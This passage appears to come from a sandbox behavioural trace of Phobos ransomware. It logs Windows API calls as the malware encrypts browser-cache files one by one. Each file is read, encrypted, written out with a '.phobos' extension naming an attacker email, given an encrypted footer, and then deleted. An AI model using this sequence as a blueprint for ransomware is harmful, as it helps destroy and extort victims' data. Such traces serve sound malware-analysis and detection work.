lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x11835, lpOverlapped=0x0) returned 1 [0181.175] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11840, dwBufLen=0x11840 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11840) returned 1 [0181.175] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x11840, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x11840, lpOverlapped=0x0) returned 1 [0181.178] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0181.178] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.178] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.178] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.178] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.178] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.178] CloseHandle (hObject=0x154) returned 1 [0181.178] CloseHandle (hObject=0xb8) returned 1 [0181.178] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js")) returned 1 [0181.180] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.180] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=551) returned 1 [0181.180] CloseHandle (hObject=0xb8) returned 1 [0181.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png")) returned 0x2020 [0181.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.181] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.181] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.243] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.243] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x227, lpOverlapped=0x0) returned 1 [0181.301] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x230, dwBufLen=0x230 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x230) returned 1 [0181.302] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x230, lpOverlapped=0x0) returned 1 [0181.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0181.324] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.324] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.324] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.324] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.325] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.325] CloseHandle (hObject=0xb8) returned 1 [0181.325] CloseHandle (hObject=0x194) returned 1 [0181.325] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBaK3Nm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbak3nm[1].png")) returned 1 [0181.326] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.326] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1768) returned 1 [0181.327] CloseHandle (hObject=0x194) returned 1 [0181.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg")) returned 0x2020 [0181.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.327] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.327] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.328] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.328] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.328] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6e8, lpOverlapped=0x0) returned 1 [0181.385] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6f0) returned 1 [0181.385] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6f0, lpOverlapped=0x0) returned 1 [0181.385] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0181.386] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.386] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.386] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.386] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.386] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.386] CloseHandle (hObject=0x194) returned 1 [0181.386] CloseHandle (hObject=0xb8) returned 1 [0181.386] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1mq[1].jpg")) returned 1 [0181.387] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.388] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=14034) returned 1 [0181.388] CloseHandle (hObject=0xb8) returned 1 [0181.388] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg")) returned 0x2020 [0181.388] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.388] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.388] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.389] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.389] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.389] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x36d2, lpOverlapped=0x0) returned 1 [0181.441] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x36e0, dwBufLen=0x36e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x36e0) returned 1 [0181.441] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x36e0, lpOverlapped=0x0) returned 1 [0181.442] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0181.442] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.442] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.442] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.442] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.442] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.442] CloseHandle (hObject=0xb8) returned 1 [0181.442] CloseHandle (hObject=0x194) returned 1 [0181.443] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBO1qB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbo1qb[1].jpg")) returned 1 [0181.444] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.444] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1886) returned 1 [0181.445] CloseHandle (hObject=0x194) returned 1 [0181.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg")) returned 0x2020 [0181.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0181.445] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.445] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0181.446] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.446] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x75e, lpOverlapped=0x0) returned 1 [0181.497] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x760, dwBufLen=0x760 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x760) returned 1 [0181.497] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x760, lpOverlapped=0x0) returned 1 [0181.498] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0181.499] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.499] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.499] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.499] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.499] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.499] CloseHandle (hObject=0x194) returned 1 [0181.499] CloseHandle (hObject=0xb8) returned 1 [0181.499] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOIAt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbboiat[1].jpg")) returned 1 [0181.500] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpk5j[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.501] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2494) returned 1 [0181.501] CloseHandle (hObject=0xb8) returned 1 [0181.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPK5J[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 